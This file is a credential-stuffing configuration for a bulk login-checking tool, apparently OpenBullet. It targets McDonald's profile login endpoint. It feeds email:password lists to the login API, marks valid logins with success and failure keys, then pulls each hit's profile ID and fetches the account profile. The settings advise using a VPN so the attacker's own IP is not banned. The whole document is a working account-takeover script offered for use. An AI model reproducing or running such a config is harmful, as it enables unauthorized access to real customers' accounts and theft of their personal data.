[SETTINGS]
{
  "Name": "McDonalds",
  "SuggestedBots": 1,
  "LastModified": "2018-07-18T23:15:13.8296522+00:00",
  "AdditionalInfo": "Only works PROXYLESS, Use a vpn to crack it to make sure your own ip doesn't get banned",
  "Author": "Banana Frog <3",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://profile2.mcdonalds.com/mcdspreferencecenterv2.asmx/PreferenceCenterLogin" AutoRedirect=TRUE 
  CONTENT "{'ClientID': 'MCDS', 'EmailAddress': '<USER>', 'Password': '<PASS>', 'CultureInfo':'', 'ExternalInfo':''}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.mcdonalds.com/us/en-us/subscription.html?op=update" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "\"Type\":\"ERROR\"}]}}" 
    KEY "Login combination is invalid.  Try again or register now." 
  KEYCHAIN Success OR 
    KEY "\",\"ErrorDesc\":null" 
    KEY ",\"Type\":\"PROCESSED\"}]}}" 
PARSE "<SOURCE>" LR "\":[{\"ProfileID\":\"" "\"," Recursive=FALSE -> VAR "PROFILEID" "" "" 
REQUEST POST "https://profile2.mcdonalds.com/mcdspreferencecenterv2.asmx/GetPreferenceCenterProfile" AutoRedirect=TRUE 
  CONTENT "{'ClientID': 'MCDS','ProfileID' : '<PROFILEID>','ExternalInfo':'', 'CultureInfo':''}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
